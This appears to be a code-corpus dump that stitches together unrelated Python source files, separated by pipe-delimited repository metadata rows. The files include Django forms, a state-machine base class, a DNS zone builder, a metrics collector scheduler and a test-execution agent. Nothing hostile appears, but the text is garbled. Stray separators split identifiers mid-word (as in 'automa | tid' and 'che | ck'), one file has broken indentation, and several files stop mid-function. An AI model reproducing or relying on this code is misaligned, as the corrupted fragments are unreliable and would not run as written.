            raise forms.ValidationError("User name is required")
        if settings.DEBUG:
            print("User: ", self.cleaned_data['user'], " = [",data, "]" )
        return data
    def clean_password(self):
        # NOTE(review): reads raw ``self.data`` rather than
        # ``self.cleaned_data``; the usual Django convention is to do this
        # check in ``clean_password2`` -- verify this hook actually runs.
        if self.data['password1'] != self.data['password2']:
            raise forms.ValidationError('Passwords are not the same')
        return self.data['password1']
class RegistrationFormUserTOSAndEmail(UserRegistrationForm,
                                      RegistrationFormUniqueEmail,
                                      RegistrationFormTermsOfService):
    """Registration form combining the local user form with unique-email
    and terms-of-service validation from django-registration."""

    class Meta:
        model = User
        fields = ['user',
                  'email',
                  'first_name',
                  'last_name']
    # exclude = ['user']
class RegistrationFormTOSAndEmail(
    RegistrationFormUniqueEmail,
    RegistrationFormTermsOfService,
):
    """Stock registration form requiring a unique email and ToS acceptance."""
    pass
|
joachimmetz/dfvfs | dfvfs/vfs/ntfs_directory.py | Python | apache-2.0 | 1,709 | 0.005851 | # -*- coding: utf-8 -*-
"""The NTFS directory implementation."""
from dfvfs.lib import errors
from dfvfs.path import ntfs_path_spec
from dfvfs.vfs import directory
class NTFSDirectory(directory.Directory):
  """File system directory that uses pyfsntfs."""

  # Lower 48 bits of an NTFS file reference hold the MFT entry number;
  # the remaining upper bits carry the sequence number.
  _FILE_REFERENCE_MFT_ENTRY_BITMASK = 0xffffffffffff

  def _EntriesGenerator(self):
    """Retrieves directory entries.

    Since a directory can contain a vast number of entries using
    a generator is more memory efficient.

    Yields:
      NTFSPathSpec: NTFS path specification.
    """
    try:
      fsntfs_file_entry = self._file_system.GetNTFSFileEntryByPathSpec(
          self.path_spec)
    except errors.PathSpecError:
      fsntfs_file_entry = None

    if fsntfs_file_entry:
      location = getattr(self.path_spec, 'location', None)

      for fsntfs_sub_file_entry in fsntfs_file_entry.sub_file_entries:
        directory_entry = fsntfs_sub_file_entry.name

        # Ignore references to self or parent.
        if directory_entry in ('.', '..'):
          continue

        file_reference = fsntfs_sub_file_entry.file_reference
        directory_entry_mft_entry = (
            file_reference & self._FILE_REFERENCE_MFT_ENTRY_BITMASK)

        if not location or location == self._file_system.PATH_SEPARATOR:
          directory_entry = self._file_system.JoinPath([directory_entry])
        else:
          directory_entry = self._file_system.JoinPath([
              location, directory_entry])

        yield ntfs_path_spec.NTFSPathSpec(
            location=directory_entry,
            mft_attribute=fsntfs_sub_file_entry.name_attribute_index,
            mft_entry=directory_entry_mft_entry, parent=self.path_spec.parent)
|
panosl/helios | helios/store/forms.py | Python | bsd-3-clause | 1,013 | 0 | from django import forms
from django.core.exceptions import ObjectDoesNotExist
from helios.store.models import Category
from helios.conf import settings
if settings.USE_PAYPAL:
from helios.paypal.forms import *
class MyCategoryAdminForm(forms.ModelForm):
    """Admin form for Category that rejects short parent cycles."""

    class Meta:
        model = Category
        fields = '__all__'

    def clean_parent(self):
        """Reject a parent that is the category itself or its direct child.

        NOTE(review): only cycles of length one or two are detected here;
        deeper recursive chains are not checked.
        """
        slug = self.cleaned_data['slug']
        parent = self.cleaned_data['parent']
        if slug and parent:
            try:
                this_category = Category.objects.get(slug=slug)
                parent_category = Category.objects.get(pk=int(parent.id))
                if (
                    parent_category.id == this_category.id
                    or parent_category.parent == this_category
                ):
                    raise forms.ValidationError(
                        'Can\'t have a category as parent of itself.'
                    )
            except ObjectDoesNotExist:
                # New category (no record for this slug yet): nothing to check.
                pass
        return parent
|
vesellov/visio2python | automat.py | Python | lgpl-3.0 | 12,453 | 0.007147 | #!/usr/bin/python
#automat.py
#
# <<<COPYRIGHT>>>
#
#
#
#
"""
.. module:: automat
This is the base class for State Machine.
You can read more about `Automata-based programming <http://en.wikipedia.org/wiki/Automata-based_programming>`_
principles and learn how to develop your project in such way.
This is a programming paradigm in which the program or its part is thought of as a model of a
`finite state machine <http://en.wikipedia.org/wiki/Finite_state_machine>`_ or any other formal automaton.
Its defining characteristic is the use of finite state machines to
`describe program behavior <http://en.wikipedia.org/wiki/State_diagram>`_.
The transition graphs of state machines are used in all stages of software development:
- specification,
- implementation,
- debugging and
- documentation.
A small tool called `visio2python <https://github.com/vesellov/visio2python/>`_
was written by Veselin Penev to simplify working with the visualized state machines.
It can translate transition graphs created in Microsoft Visio into Python code.
Automata-Based Programming technology was introduced by Anatoly Shalyto in 1991 and Switch-technology was
developed to support automata-based programming.
Automata-Based Programming is considered to be rather general purpose program development methodology
than just another one finite state machine implementation.
Anatoly Shalyto is the former of
`Foundation for Open Project Documentation <http://en.wikipedia.org/wiki/Foundation_for_Open_Project_Documentation>`_.
Read more about Switch-technology on the Saint-Petersburg National Research University
of Information Technologies, Mechanics and Optics, Programming Technologies Department
`Page <http://is.ifmo.ru/english>`_.
"""
#------------------------------------------------------------------------------
import logging
import sys
import time
import traceback
#------------------------------------------------------------------------------
logger = logging.getLogger(__name__)
#------------------------------------------------------------------------------
_Debug = True # set to False to turn off any logging
_LogEvents = True # set to True to log every event passed to any state machine
#------------------------------------------------------------------------------
_Counter = 0 #: Increment by one for every new object, the idea is to keep unique ID's in the index
_Index = {} #: Index dictionary, unique id (string) to index (int)
_Objects = {} #: Objects dictionary to store all state machines objects
_StateChangedCallback = None #: Called when some state were changed
_LogFile = None #: This is to have a separated Log file for state machines logs
_LogFilename = None
_LogsCount = 0 #: If not zero - it will print time since that value, not system time
_LifeBeginsTime = 0
#------------------------------------------------------------------------------
def get_new_index():
    """
    Return the next unique index, incrementing the module-wide counter.

    No locking is done here; callers are expected to serialize access.
    """
    global _Counter
    _Counter += 1
    return _Counter
def create_index(name):
    """
    Generate a unique automat id based on ``name``, register it in the
    module-wide ``_Index`` with a fresh index, and return ``(id, index)``.

    When ``name`` is already registered a numeric suffix is appended,
    e.g. ``name(1)``, ``name(2)``, ... until an unused id is found.
    """
    global _Index
    automatid = name
    # BUG FIX: the original tested ``if id in _Index`` -- the *builtin*
    # ``id`` function, which is never a dict key -- so the disambiguation
    # branch was dead and duplicate names overwrote each other's entry.
    if automatid in _Index:
        i = 1
        while _Index.get(automatid + '(' + str(i) + ')'):
            i += 1
        automatid = name + '(' + str(i) + ')'
    _Index[automatid] = get_new_index()
    return automatid, _Index[automatid]
def set_object(index, obj):
    """
    Register a state machine instance in the module-wide registry
    under the given integer ``index``.
    """
    global _Objects
    _Objects[index] = obj
def clear_object(index):
    """
    Remove the state machine stored under ``index`` from the registry.

    Silently does nothing when the registry is gone or the index is unknown.
    """
    global _Objects
    if _Objects is not None:
        _Objects.pop(index, None)
def objects():
    """
    Return the module-wide registry dict of all state machines in memory,
    keyed by their integer index.
    """
    global _Objects
    return _Objects
#------------------------------------------------------------------------------
def SetStateChangedCallback(cb):
    """
    Set callback to be fired when any state machine globally changes its state
    Callback parameters are::

        cb(index, id, name, old_state, new_state)
    """
    # Stored in a module global; only one callback can be active at a time.
    global _StateChangedCallback
    _StateChangedCallback = cb
def OpenLogFile(filename):
    """
    Open a file to write logs from all state machines. Very useful during debug.

    A no-op when a log file is already open; on failure logging simply
    stays disabled (``_LogFile`` is left as None).
    """
    global _LogFile
    global _LogFilename
    if _LogFile:
        return
    _LogFilename = filename
    try:
        _LogFile = open(_LogFilename, 'w')
    except (IOError, OSError):
        # Narrowed from a bare ``except``: only swallow file-system errors
        # instead of masking every possible exception.
        _LogFile = None
def CloseLogFile():
    """
    Close the current log file, you can than open it again.
    """
    global _LogFile
    # BUG FIX: ``global _LogFilename`` was missing, so the assignment at the
    # bottom created a dead local and the module-level filename stayed stale.
    global _LogFilename
    if not _LogFile:
        return
    _LogFile.flush()
    _LogFile.close()
    _LogFile = None
    _LogFilename = None
def LifeBegins(when=None):
    """
    Call that function during program start up to print relative time in the logs, not absolute.

    :param when: explicit start timestamp; defaults to ``time.time()``.
    """
    global _LifeBeginsTime
    # ``is not None`` instead of truthiness so an explicit timestamp of 0
    # (the epoch) is honored rather than silently replaced.
    if when is not None:
        _LifeBeginsTime = when
    else:
        _LifeBeginsTime = time.time()
#------------------------------------------------------------------------------
class Automat(object):
"""
Base class of the State Machine Object.
You need to subclass this class and override the method ``A(event, arg)``.
Constructor needs the ``name`` of the state machine and the beginning ``state``.
At first it generate an unique ``id`` and new ``index`` value.
You can use ``init()`` method in the subclass to call some code at start.
Finally put the new object into the memory with given index -
it is placed into ``objects()`` dictionary.
To remove the instance call ``destroy()`` method.
"""
state = 'NOT_EXIST'
"""
This is a string representing current Machine state, must be set in the constructor.
``NOT_EXIST`` indicates that this machine is not created yet.
A blank state is a fundamental mistake!
"""
post = False
"""
Sometimes need to set the new state AFTER finish all actions.
Set ``post = True`` to call ``self.state = <newstate>``
in the ``self.event()`` method, not in the ``self.A()`` method.
You also must set that flag in the MS Visio document and rebuild the code:
put ``[post]`` string into the last line of the LABEL shape.
"""
    def __init__(self, name, state, debug_level=18, log_events=False, log_transitions=False, **kwargs):
        # Allocate a unique id + index and register this machine globally.
        self.id, self.index = create_index(name)
        self.name = name
        self.state = state
        self.debug_level = debug_level
        self.log_events = log_events
        self.log_transitions = log_transitions
        # Subclass hook; extra constructor kwargs are forwarded to it.
        self.init(**kwargs)
        set_object(self.index, self)
        self.log(self.debug_level, 'CREATED AUTOMAT %s with index %d' % (str(self), self.index))
def __del__(self):
global _Index
global _StateChangedCallback
if self is None:
return
o = self
last_state = self.state
automa | tid = self.id
name = self.name
debug_level = self.debug_level
if _Index is None:
self.log(debug_level, 'automat.__del__ WARNING Index is None: %r %r' % (automatid, name))
return
| index = _Index.get(automatid, None)
if index is None:
self.log(debug_level, 'automat.__del__ WARNING %s not found' % automatid)
return
del _Index[automatid]
self.log(debug_level, 'DESTROYED AUTOMAT %s with index %d' % (str(o), index))
del o
if _StateChangedCallback is not None:
_StateChangedCallback(index, automatid, name, last_state, 'NOT_EXIST')
def __str__(self):
"""
Will print something like: "network_connector(CONNECTED)"
"""
return '%s(%s)' % (self.id, self.state)
def init(self, **kwargs):
"""
Define |
ktdreyer/rdopkg | rdopkg/utils/log.py | Python | apache-2.0 | 1,968 | 0 | import logging
import terminal
INFO = logging.INFO
# between info and debug
VERBOSE = (logging.INFO + logging.DEBUG) / 2
DEBUG = logging.DEBUG
log = logging.getLogger('rdopkg')
log.setLevel(logging.INFO)
if len(log.handlers) < 1:
formatter = logging.Formatter(fmt='%(message)s')
handler = logging.StreamHandler()
handler.setFormatter(formatter)
log.addHandler(handler)
class LogTerminal(terminal.Terminal):
    """Terminal subclass mapping semantic log styles to concrete colors."""
    @property
    def warn(self):
        return self.yellow
    @property
    def important(self):
        return self.yellow_bold
    @property
    def error(self):
        return self.red
    @property
    def good(self):
        return self.green
    @property
    def cmd(self):
        return self.cyan
term = LogTerminal()
def set_colors(colors):
    """Configure the global terminal per ``colors`` ('yes'/'no'/'auto').

    Returns True when the requested mode could be applied, False otherwise
    (e.g. 'yes' requested on a terminal without color support).
    """
    global term
    if colors == 'auto':
        term = LogTerminal()
        return True
    if colors == 'yes':
        if not terminal.COLOR_TERMINAL:
            return False
        term = LogTerminal(force_styling=True)
        return True
    if colors == 'no':
        # On a non-color terminal there is nothing to disable.
        if terminal.COLOR_TERMINAL:
            term = LogTerminal(force_styling=None)
        return True
    return False
def error(*args, **kwargs):
    """Log at ERROR level, coloring the format string with the error style."""
    if args:
        args = (term.error(args[0]),) + args[1:]
    log.error(*args, **kwargs)
def warn(*args, **kwargs):
    """Log at WARNING level, coloring the format string with the warn style."""
    if args:
        args = (term.warn(args[0]),) + args[1:]
    log.warning(*args, **kwargs)
def success(*args, **kwargs):
    """Log at INFO level, coloring the format string with the 'good' style."""
    if args:
        args = (term.good(args[0]),) + args[1:]
    log.info(*args, **kwargs)
def info(*args, **kwargs):
    # Uncolored INFO-level passthrough to the module logger.
    log.info(*args, **kwargs)
def verbose(*args, **kwargs):
    # Logs at the custom VERBOSE level (between INFO and DEBUG).
    log.log(VERBOSE, *args, **kwargs)
def debug(*args, **kwargs):
    # DEBUG-level passthrough to the module logger.
    log.debug(*args, **kwargs)
def command(*args, **kwargs):
    # NOTE(review): currently identical to info(); presumably kept as a
    # separate name so call sites can signal "this logs a shell command".
    log.info(*args, **kwargs)
|
realizelol/xenmailserv | management/dns_update.py | Python | gpl-3.0 | 37,781 | 0.024139 | #!/usr/bin/python3
# Creates DNS zone files for all of the domains of all of the mail users
# and mail aliases and restarts nsd.
########################################################################
import sys, os, os.path, urllib.parse, datetime, re, hashlib, base64
import ipaddress
import rtyaml
import dns.resolver
from mailconfig import get_mail_domains
from utils import shell, load_env_vars_from_file, safe_domain_name, sort_domains
def get_dns_domains(env):
	"""Return the set of domains DNS must cover: every mail domain in use
	plus the machine's PRIMARY_HOSTNAME."""
	domains = set(get_mail_domains(env))
	domains.add(env['PRIMARY_HOSTNAME'])
	return domains
def get_dns_zones(env):
	"""Return a stable-ordered list of [domain, zone_filename] pairs for
	every domain that should get its own DNS zone (subdomains of another
	known domain are folded into the parent's zone)."""
	# What domains should we create DNS zones for? Never create a zone for
	# a domain & a subdomain of that domain.
	domains = get_dns_domains(env)
	# Exclude domains that are subdomains of other domains we know. Proceed
	# by looking at shorter domains first.
	zone_domains = set()
	for domain in sorted(domains, key=lambda d : len(d)):
		for d in zone_domains:
			if domain.endswith("." + d):
				# We found a parent domain already in the list.
				break
		else:
			# 'break' did not occur: there is no parent domain.
			zone_domains.add(domain)
	# Make a nice and safe filename for each domain.
	zonefiles = []
	for domain in zone_domains:
		zonefiles.append([domain, safe_domain_name(domain) + ".txt"])
	# Sort the list so that the order is nice and so that nsd.conf has a
	# stable order so we don't rewrite the file & restart the service
	# meaninglessly.
	zone_order = sort_domains([ zone[0] for zone in zonefiles ], env)
	zonefiles.sort(key = lambda zone : zone_order.index(zone[0]) )
	return zonefiles
def do_dns_update(env, force=False):
	"""Regenerate, sign and install all DNS zone files, restart nsd when
	anything changed, refresh OpenDKIM tables, and flush the local resolver.

	Returns a human-readable summary string ('' when nothing changed)."""
	# Write zone files.
	os.makedirs('/etc/nsd/zones', exist_ok=True)
	zonefiles = []
	updated_domains = []
	for (domain, zonefile, records) in build_zones(env):
		# The final set of files will be signed.
		zonefiles.append((domain, zonefile + ".signed"))
		# See if the zone has changed, and if so update the serial number
		# and write the zone file.
		if not write_nsd_zone(domain, "/etc/nsd/zones/" + zonefile, records, env, force):
			# Zone was not updated. There were no changes.
			continue
		# Mark that we just updated this domain.
		updated_domains.append(domain)
		# Sign the zone.
		#
		# Every time we sign the zone we get a new result, which means
		# we can't sign a zone without bumping the zone's serial number.
		# Thus we only sign a zone if write_nsd_zone returned True
		# indicating the zone changed, and thus it got a new serial number.
		# write_nsd_zone is smart enough to check if a zone's signature
		# is nearing expiration and if so it'll bump the serial number
		# and return True so we get a chance to re-sign it.
		sign_zone(domain, zonefile, env)
	# Write the main nsd.conf file.
	if write_nsd_conf(zonefiles, list(get_custom_dns_config(env)), env):
		# Make sure updated_domains contains *something* if we wrote an updated
		# nsd.conf so that we know to restart nsd.
		if len(updated_domains) == 0:
			updated_domains.append("DNS configuration")
	# Kick nsd if anything changed.
	if len(updated_domains) > 0:
		shell('check_call', ["/usr/sbin/service", "nsd", "restart"])
	# Write the OpenDKIM configuration tables for all of the domains.
	if write_opendkim_tables(get_mail_domains(env), env):
		# Settings changed. Kick opendkim.
		shell('check_call', ["/usr/sbin/service", "opendkim", "restart"])
		if len(updated_domains) == 0:
			# If this is the only thing that changed?
			updated_domains.append("OpenDKIM configuration")
	# Clear bind9's DNS cache so our own DNS resolver is up to date.
	# (ignore errors with trap=True)
	shell('check_call', ["/usr/sbin/rndc", "flush"], trap=True)
	if len(updated_domains) == 0:
		# if nothing was updated (except maybe OpenDKIM's files), don't show any output
		return ""
	else:
		return "updated DNS: " + ",".join(updated_domains) + "\n"
########################################################################
def build_zones(env):
	"""Yield (domain, zonefile_name, records) for every DNS zone to build."""
	# What domains (and their zone filenames) should we build?
	domains = get_dns_domains(env)
	zonefiles = get_dns_zones(env)

	# Custom records to add to zones.
	additional_records = list(get_custom_dns_config(env))

	# Imported here (not at module top) to avoid a circular import with
	# web_update, which itself imports from this module.
	from web_update import get_web_domains
	www_redirect_domains = set(get_web_domains(env)) - set(get_web_domains(env, include_www_redirects=False))

	# Build DNS records for each zone.
	for domain, zonefile in zonefiles:
		# Build the records to put in the zone.
		records = build_zone(domain, domains, additional_records, www_redirect_domains, env)
		yield (domain, zonefile, records)
def build_zone(domain, all_domains, additional_records, www_redirect_domains, env, is_zone=True):
records = []
# For top-level zones, define the authoritative name servers.
#
# Normally we are our own nameservers. Some TLDs require two distinct IP addresses,
# so we allow the user to override the second nameserver definition so that
# secondary DNS can be set up elsewhere.
#
# 'False' in the tuple indicates these records would not be used if the zone
# is managed outside of the box.
if is_zone:
# Obligatory definition of ns1.PRIMARY_HOSTNAME.
records.append((None, "NS", "ns1.%s." % env["PRIMARY_HOSTNAME"], False))
# Define ns2.PRIMARY_HOSTNAME or whatever the user overrides.
# User may provide one or more additional nameservers
secondary_ns_list = get_secondary_dns(additional_records, mode="NS") \
or ["ns2." + env["PRIMARY_HOSTNAME"]]
for secondary_ns in secondary_ns_list:
records.append((None, "NS", secondary_ns+'.', False))
# In PRIMARY_HOSTNAME...
if domain == env["PRIMARY_HOSTNAME"]:
# Define ns1 and ns2.
# 'False' in the tuple indicates these records would not be used if the zone
# is managed outside of the box.
records.append(("ns1", "A", env["PUBLIC_IP"], False))
records.append(("ns2", "A", env["PUBLIC_IP"], False))
if env.get('PUBLIC_IPV6'):
records.append(("ns1", "AAAA", env["PUBLIC_IPV6"], False))
records.append(("ns2", "AAAA", env["PUBLIC_IPV6"], False))
# Set the A/AAAA records. Do this early for the PRIMARY_HOSTNAME so that the user cannot override them
# and we can provide different explanatory text.
records.append((None, "A", env["PUBLIC_IP"], "Required. Sets the IP address of the box."))
if env.get("PUBLIC_IPV6"): records.append((None, "AAAA", env["PUBLIC_IPV6"], "Required. Sets the IPv6 address of the box."))
# Add a DANE TLSA record for SMTP.
records.append(("_25._tcp", "TLSA", build_tlsa_record(env), "Recommended when DNSSEC is enabled. Advertises to mail servers connecting to the box that mandatory encryption should be used."))
# Add a DANE TLSA record for HTTPS, which some browser extensions might make use of.
records.append(("_443._tcp", "TLSA", build_tlsa_record(env), "Optional. When DNSSEC is enabled, provides out-of-band HTTPS certificate validation for a few web clients that support it."))
# Add a SSHFP records to help SSH key validation. One per available SSH key on this system.
for value in build_sshfp_records():
records.append((None, "SSHFP", value, "Optional. Provides an out-of-band method for verifying an SSH key before connecting. Use 'VerifyHostKeyDNS yes' (or 'VerifyHostKeyDNS ask') when connecting with ssh."))
# Add DNS records for any subdomains of this domain. We should not have a zone for
# both a domain and one of its subdomains.
subdomains = [d for d in all_domains if d.endswith("." + domain)]
for subdomain in subdomains:
subdomain_qname = subdomain[0:-len("." + domain)]
subzone = build_zone(subdomain, [], additional_records, www_redirect_domains, env, is_zone=False)
for child_qname, child_rtype, child_value, child_explanation in subzone:
if child_qname == None:
child_qname = subdomain_qname
else:
child_qname += "." + subdomain_qname
records.append((child_qname, child_rtype, child_value, child_explanation))
has_rec_base = list(records) # clone current state
def has_rec(qname, rtype, prefix=None):
for rec in has_rec_base:
if rec[0] == qname and rec[1] == rtype and (prefix is No |
jriguera/Diamond | src/diamond/utils/scheduler.py | Python | mit | 3,514 | 0 | # coding=utf-8
import time
import math
import multiprocessing
import os
import random
import sys
import signal
try:
from setproctitle import getproctitle, setproctitle
except ImportError:
setproctitle = None
from diamond.utils.signals import signal_to_exception
from diamond.utils.signals import SIGALRMException
from diamond.utils.signals import SIGHUPException
def collector_process(collector, metric_queue, log):
    """
    Run one collector forever in its own process: sleep until the next
    collection window (plus a random stagger), run the collector under a
    SIGALRM deadline, and handle reload (SIGHUP) and timeout (SIGALRM)
    signals delivered as exceptions.
    """
    proc = multiprocessing.current_process()
    if setproctitle:
        setproctitle('%s - %s' % (getproctitle(), proc.name))

    signal.signal(signal.SIGALRM, signal_to_exception)
    signal.signal(signal.SIGHUP, signal_to_exception)
    signal.signal(signal.SIGUSR2, signal_to_exception)

    interval = float(collector.config['interval'])

    log.debug('Starting')
    log.debug('Interval: %s seconds', interval)

    # Validate the interval
    if interval <= 0:
        log.critical('interval of %s is not valid!', interval)
        sys.exit(1)

    # Start the next execution at the next window plus some stagger delay to
    # avoid having all collectors running at the same time
    next_window = math.floor(time.time() / interval) * interval
    stagger_offset = random.uniform(0, interval - 1)

    # Allocate time till the end of the window for the collector to run. With a
    # minimum of 1 second
    max_time = int(max(interval - stagger_offset, 1))
    log.debug('Max collection time: %s seconds', max_time)

    # Setup stderr/stdout as /dev/null so random print statements in thrid
    # party libs do not fail and prevent collectors from running.
    # https://github.com/BrightcoveOS/Diamond/issues/722
    sys.stdout = open(os.devnull, 'w')
    sys.stderr = open(os.devnull, 'w')

    while(True):
        try:
            time_to_sleep = (next_window + stagger_offset) - time.time()
            if time_to_sleep > 0:
                time.sleep(time_to_sleep)
            next_window += interval

            # Ensure collector run times fit into the collection window
            signal.alarm(max_time)

            # Collect!
            collector._run()

            # Success! Disable the alarm
            signal.alarm(0)

        except SIGALRMException:
            log.error('Took too long to run! Killed!')

            # Adjust the stagger_offset to allow for more time to run the
            # collector
            stagger_offset = stagger_offset * 0.9

            max_time = int(max(interval - stagger_offset, 1))
            log.debug('Max collection time: %s seconds', max_time)

        except SIGHUPException:
            # Reload the config if requested
            # We must first disable the alarm as we don't want it to interrupt
            # us and end up with half a loaded config
            signal.alarm(0)

            log.info('Reloading config reload due to HUP')
            collector.load_config()
            log.info('Config reloaded')

        except Exception:
            log.exception('Collector failed!')
            break
def handler_process(handlers, metric_queue, log):
    """
    Run forever in a dedicated process: block on the shared metric queue,
    feed every received metric through every handler, then flush them all.
    """
    proc = multiprocessing.current_process()
    if setproctitle:
        setproctitle('%s - %s' % (getproctitle(), proc.name))

    log.debug('Starting process %s', proc.name)

    while(True):
        # Blocks indefinitely until a batch of metrics arrives.
        metrics = metric_queue.get(block=True, timeout=None)
        for metric in metrics:
            for handler in handlers:
                handler._process(metric)
        for handler in handlers:
            handler._flush()
|
danriti/python-traceview | traceview/host.py | Python | mit | 688 | 0 | # -*- coding: utf-8 -*-
"""
traceview.hosts
This module contains the objects associated with Hosts API resources.
http://dev.appneta.com/docs/api-v2/hosts.html
"""
from .resource import Resource
class Host(Resource):
    """Hosts API resource: list hosts (optionally per app) and delete one."""

    def get(self, app=None):
        """GET hosts, scoped to a single app when ``app`` is given."""
        if app:
            path = 'app/{app}/hosts'.format(app=app)
        else:
            path = 'hosts'
        return self.api.get(path)

    def delete(self, host_id):
        """DELETE a single host by id."""
        path = 'hosts/{host_id}'.format(host_id=host_id)
        return self.api.delete(path)
class Instrumentation(Resource):
    """Instrumentation-versions API resource for a single host."""

    def get(self, host_id):
        """GET the instrumentation versions installed on ``host_id``."""
        path = 'hosts/{host_id}/versions'.format(host_id=host_id)
        return self.api.get(path)
|
qedsoftware/commcare-hq | corehq/sql_accessors/migrations/0035_add_undelete_functions.py | Python | bsd-3-clause | 612 | 0 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations
from corehq.sql_db.operations import RawSQLMigration
from corehq.form_processor.models import XFormInstanceSQL
migrator = RawSQLMigration(('corehq', 'sql_accessors', 'sql_templates'), {
'FORM_STATE_DELETED': XFormInstanceSQL.DELETED
})
class Migration(migrations.Migration):
    """Installs the soft-undelete SQL functions for cases and forms."""

    dependencies = [
        ('sql_accessors', '0034_update_reindex_functions'),
    ]

    operations = [
        migrator.get_migration('soft_undelete_cases.sql'),
        migrator.get_migration('soft_undelete_forms.sql'),
    ]
|
maliubiao/python_netlink | setup.py | Python | mit | 277 | 0.057762 | #! /usr/bin/env python
from distutils.core import setup, Extension

# Native C extension wrapping network-device queries.
m = Extension('netdev',
              sources=['netdev.c'])

setup(name='netdev',
      version='1.0',
      description='python native library for network device',
      ext_modules=[m])
|
deepeshmittal/daytona | Scheduler+Agent/action.py | Python | apache-2.0 | 25,730 | 0.008511 | # This file implements all actions performed by agent to start execution script on exec host and sar data collection
# from all exec and stat hosts. Each procedure is mapped with particular daytona command used by scheduler to
# communicate with agent. Upon recieving command from daytona scheduler, agent execute below procedure
# which is mapped with that particular daytona command
#!/usr/bin/env python
import subprocess
import threading
import common
import os
import time
import shutil
from shutil import copyfile
import sys
import testobj
import client
import config
import signal
import envelope
import system_metrics_gather
from logger import LOG
lctx = None
cfg = config.CFG("DaytonaHost", lctx)
cfg.readCFG("config.ini")
EXEC_SCRIPT_DIR = cfg.execscript_location
# Agent on a particular host maintains a list of tests it is currently executing and it also keep updating test data.
# It's a key-value pair map in which each class object is associated with test ID
running_tests = {}
action_lock = threading.Lock()
exec_script_pid = {}
exec_script_lock = threading.Lock()
class activeTest:
    """
    This class defines a test object which capture all the information of the test. Agent save these test objects
    in a queue to maintain information of all running tests.
    """
    def __init__(self, testid, actionID, exec_thread, testobj):
        self.testid = testid
        self.actionID = actionID
        # commandThread running the execution script (None until started).
        self.exec_thread = exec_thread
        self.tobj = testobj
        # Log-streaming handle back to the scheduler, set on DAYTONA_START_TEST.
        self.stream = None
        self.status = ""
        # Scheduler / stats-host endpoints for this test.
        self.serverip = ""
        self.stathostip = ""
        self.serverport = 0
        self.stathostport = 0
        # Working directories used during execution and result collection.
        self.execdir = ""
        self.logdir = ""
        self.resultsdir = ""
        self.statsdir = ""
        self.archivedir = ""
        self.execscriptfile = ""
        self.hostname = ""
    def clear(self):
        lctx.info("Clearing object contents")
        self.cleanup()
    def cleanup(self):
        # NOTE(review): only logs; actual FS/process cleanup appears
        # unimplemented here -- confirm whether this is intentional.
        lctx.info("Clearing FS, processes")
class commandThread(threading.Thread):
    """
    This class creates child thread for starting execution script or executing any other linux based command to get
    output from the system
    """
    def __init__(self, cmdstr, dcmdstr, streamfile, cdir, testid):
        self.cmd = cmdstr
        self.dcmd = dcmdstr
        # Optional file the child's output is streamed/flushed to.
        self.sfile = streamfile
        self.cwd = cdir
        self.paused = False
        self._stop = threading.Event()
        self.stdout = None
        self.stderr = None
        self.testid = testid
        threading.Thread.__init__(self)
    def resume(self):
        # NOTE(review): ``self.state`` is never initialized anywhere in this
        # class; resume/pause/check would raise AttributeError if called.
        # Presumably a threading.Condition was intended -- confirm whether
        # these methods are actually used.
        with self.state:
            self.paused = False
            self.state.notify()  # unblock self if waiting
    def pause(self):
        with self.state:
            self.paused = True # make self block and wait
    def check(self):
        with self.state:
            if self.paused:
                self.state.wait() # block until notified
        if self._stop.isSet():
            return False
    def stop(self):
        self._stop.set()
    def __del__(self):
        self._stop.set()
    def stopped(self):
        return self._stop.isSet()
    def run(self):
        lctx.debug(self.cmd)
        ca = self.cmd.split(" ")
        lctx.debug(ca)
        # os.setsid is used for creating a new pid group for this exec script excuting so that any subsequent
        # child thread or another script invocation will remain in same PID group. In the event of timer expire or if
        # something goes wrong, we will just kill this PID group to kill everything.
        p = subprocess.Popen(ca, shell=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=self.cwd,
                             preexec_fn=os.setsid)
        # Saving PID information for keeping track of PID group
        exec_script_lock.acquire()
        exec_script_pid[self.testid] = p
        exec_script_lock.release()
        # Pump the child's combined stdout/stderr one byte at a time until it
        # exits, mirroring output to our stdout and flushing the stream file.
        while True:
            out = p.stdout.read(1)
            if out == '' and p.poll() is not None:
                break
            if out != '':
                sys.stdout.write(out)
                sys.stdout.flush()
                if self.sfile is not None:
                    self.sfile.flush()
        self.sfile.flush()
def get_test(testid):
    """
    Look up a test in the agent's running-test registry under the shared lock
    (multiple threads may be executing actions for the same test).

    :param testid: key identifying the test in the running queue
    :return: the test object, or None when the test is not registered
    """
    # ``with`` guarantees the lock is released even if the lookup raises,
    # where the original explicit acquire()/release() pair could leak it.
    with action_lock:
        return running_tests.get(testid)
def save_test(testid, test):
"""
This procedure is called to update test information in agent queue.
:param testid: Test ID is a key in running test queue
:param test: Updated test object which need to be saved in running queue
:return: true if update is successfull
"""
found = False
action_lock.acquire()
if testid in running_tests:
running_tests[testid] = test
found = True
action_lock.release()
return found
def delete_test(testid):
"""
This procedure delete the test information from the running queue. This will happen if test execution ends or
something goes wrong with the test
:param testid: Test ID to identify test in running queue
:return: NA
"""
action_lock.acquire()
if testid in running_tests:
del running_tests[testid]
action_lock.release()
def exec_cmd(cmd, daytona_cmd, sync, obj, actionid, current_test):
"""
This procedure does the setup for starting execution script. It creates object of child process which execute
startup script
"""
lctx.debug("Execute cmd : " + cmd)
sfile = None
cl = None
########
if daytona_cmd == "DAYTONA_START_TEST":
cl = client.TCPClient(LOG.getLogger("clientlog", "Agent"))
(current_test.stream, sfile) = cl.stream_start(current_test.serverip, current_test.serverport,
str(current_test.tobj.testobj.TestInputData.exec_log_path))
########
if sfile is not None:
sfile.flush()
cthread = commandThread(cmd, daytona_cmd, sfile, current_test.execdir, current_test.testid)
current_test.exec_thread = cthread
cthread.start()
| (t, aid, tst, ts) = (None, None, None, None)
if sync == "T":
lctx.debug("Execute cmd in Sync ctx")
cthread.join()
if sfile is not None:
sfile.flush()
else:
# async action entry in the server table (need this to che | ck self alive below)
for tp in obj.async_actions:
if tp[1] == actionid:
(t, aid, tst, ts) = tp
lctx.debug("Execute cmd in asSync ctx : " + str(actionid))
timer_expire = False
while True:
lctx.debug("waiting for async action to complete : " + str(actionid))
if cthread.stdout is not None:
lctx.debug("printting output of stream ")
if sfile is not None:
sfile.flush()
if tst.testobj.TestInputData.timeout > 0:
if time.time() - ts > tst.testobj.TestInputData.timeout:
lctx.error("Timer expired for this test, need to end this async action")
timer_expire = True
# Exit from this while loop if timer expires or execution script ends
if t.check() == False or cthread.is_alive() == False or timer_expire:
if daytona_cmd == "DAYTONA_START_TEST":
if cthread.is_alive():
